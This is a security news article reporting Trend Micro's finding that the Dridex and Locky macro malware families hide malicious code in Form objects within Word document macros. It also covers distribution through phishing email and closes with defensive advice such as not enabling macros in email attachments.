Macro Malware Dridex, Locky Using Forms to Hide Code

Researchers at Trend Micro recently observed a change in the Dridex and Locky macro malware families, which are now using Form object in macros to obfuscate their malicious code.

Spotted in February, Locky was immediately associated with Dridex for using the same infiltration technique as the notorious banking Trojan, namely malicious macros found in Word documents. Although ransomware relying on macros for distribution was observed before, the latest change in both malware families appears to tighten the connection between them.

In February, researchers at Palo Alto Networks observed around 446,000 individual sessions containing the Bartallex macro downloader, which in turned dropped Locky on compromised systems. The large number of sessions also revealed that the ransomware’s operators were putting significant effort into pushing Locky to the top of the ransomware charts.

In a recent blog post, Trend Micro’s Wilson Agad revealed that the ransomware’s authors are also focused on improving their malicious creation. The Locky crypto-ransomware was observed using Form object in macros to obfuscate the malicious code, an improvement that could allow adversaries hide malicious activities performed on target networks or systems.

The use of malicious macros to achieve high infection rates is an attack method that was very popular about a decade ago, but which went almost extinct after Microsoft disabled macros by default in Office 2007. In the past few years, however, it has become a popular attack technique once again, being used mainly by malware such as Dridex and Rovnix, as well as by the enterprise-oriented Bartalex.

Until recently, macro malware relied on easy to implement scripts that were laid in the macro sheet to deliver and execute the malicious payload. The scripts required users to manually enable macros to trigger the malware execution, and Form objects, which are windows or dialog boxes that make up part of an application's user interface, are no different.

As Agad explains, however, the new technique also requires the shellcode to be accessed and the implementation is more difficult compared to scripts. However, the installation routine isn’t necessarily affected by the use of Forms, the researcher also says.

To infect systems, attackers rely on users opening a poisoned Word document file attached to a malicious email, which includes the malicious macros. Since the targets are typically employees that deal with documents with forms on a daily basis, the chances of successful infection are higher.

As Proofpoint revealed in the recently published Human Factor 2016 report, attackers are increasingly relying on people becoming their unwitting accomplices in attempts to steal information and money. A very large portion of last year’s attacks relied on social engineering, with 99.7 percent of attachment documents in spam email campaigns requiring human interaction to deliver the malicious payload.

Given that the use of social engineering in delivering malware is trending, it does not come as a surprise that ransomware authors adopted it as well. However, Locky, which mostly affects users in Germany, Japan, and the United States at the moment, appears to be the first instance of ransomware that replicates use of malicious macros (commonly seen in Dridex), and which also adopted the use of Forms so early.

“Awareness of such threats and their behavior is one of the initial steps in order to combat their risks. It’s also important to not enable macros from email attachments as this can add another layer of protection to prevent the download of malicious files on the system. For enterprises or organizations, it may be best to block email messages with attachments from suspicious sources,” Agad concludes.